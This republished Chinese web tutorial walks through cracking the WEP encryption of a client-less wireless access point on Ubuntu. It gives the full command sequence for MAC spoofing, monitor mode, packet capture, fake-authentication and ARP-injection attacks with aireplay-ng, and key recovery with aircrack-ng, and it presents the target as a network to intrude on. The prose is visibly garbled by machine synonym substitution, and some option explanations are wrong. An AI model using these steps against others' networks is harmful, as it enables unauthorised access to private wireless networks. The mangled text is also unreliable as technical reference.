当前位置:七道奇文章资讯系统安全Linux安全
日期:2012-05-05 23:04:00  来源:本站整理

Ubuntu下无客户端无线WEP加密破解实战[Linux安全]

赞助商链接



  本文“Ubuntu下无客户端无线WEP加密破解实战[Linux安全]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

  在图形界面中,翻开一个Shell,以下图,输入ifconfig -a 察看当前网卡

  这里我就利用USB网卡为例,可以看到有一个名为rausb0的网卡,状况是未载入,这里先不要载入,先将MAC地址改正成需假造的肆意MAC地址,

  输入macchanger –m 00:11:22:33:44:55 rausb0

  -m后跟要假造的MAC,之后再跟要改正的网卡名便可,这里我们将该USB网卡MAC改正成00:11:22:33:44:55

  然后再载入网卡,输入:

  ifconfig -a rausb0 up来载入USB网卡驱动

  下来,我们可以利用如Kismet、Airosnort等工具来扫描当前无线网络的AP,

  然后,我们需求将网卡激活成monitor情势,才可以举行后续的破解,号令以下:

  airmon-ng start rausb0 3,这里这个3就是我们发现的AP的频道,然后输入下列号令开始抓包

  airodump-ng -w test.cap --channel 3 rausb0 ,这里test.cap就是我设置的抓包文件名

  下来,便可以举行FakeAuth攻击,这种攻击就是专门在预攻击无线接入点AP没有客户端活动乃至不存在Client的情形下利用的.具体号令以下:

  aireplay-ng -1 1 -e AP’s ESSID -a AP’s MAC -h FakeMAC rausb0

  这里-1指的就是采取FakeAuth攻击情势,背面跟耽误;-e背面跟AP的ESSID,-a背面设置AP的MAC,-h背面则是前面假造的MAC,最后是无线网卡.

  与此同时,为了IVs(初始化向量)的获得,必须举行ArpRequest注入式攻击,这个很重要,可以有效提高抓包数目及破解速度,号令以下

  aireplay-ng -3 -b AP's MAC -h Client's MAC -x 1024 rausb0

  注释一下:-3指的是采纳ArpRequest注入攻击方法,-b背面跟上要入侵的AP的MAC地址,-h背面跟的是监测到的客户端MAC地址,这里我们利用方才假造的客户端MAC,如上图中显示的,至于-x 1024指的是定义每秒发送数据包数目,这个值可以小一些,但最高1024便可以了,这里我利用默许,最后是指定USB无线网卡接下来,便可以同步开启 aircrack-ng来举行同步破解了,号令以下:

  aircrack-ng -x -f 2 test-01.cap这里-x是暴力破解情势,-f指的是启用密码复杂度为2 ,背面是我们当即保存的那个抓包文件.

  以上是“Ubuntu下无客户端无线WEP加密破解实战[Linux安全]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • ubuntu下无法利用无线网络的办理办法
  • 三步搞定windows与ubuntu之间文件同享
  • Ubuntu和windows文件同享问题详解
  • 在 Ubuntu 12.04 Server 上安装 Rails 环境
  • ubuntu 12.04 安装 Nginx+PHP5 (PHP-FPM) +MySQL主机详解
  • Linux(ubuntu)下配置android环境
  • Ubuntu 10.04上搭建Ruby on Rails环境
  • Ubuntu 10.10中关闭按钮位置的改变
  • Ubuntu下检测CPU温度的工具
  • Ubuntu Server增添关机用户
  • Ubuntu 11.04安装火狐5
  • ubuntu 10.04下搭建samba文件服务器
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .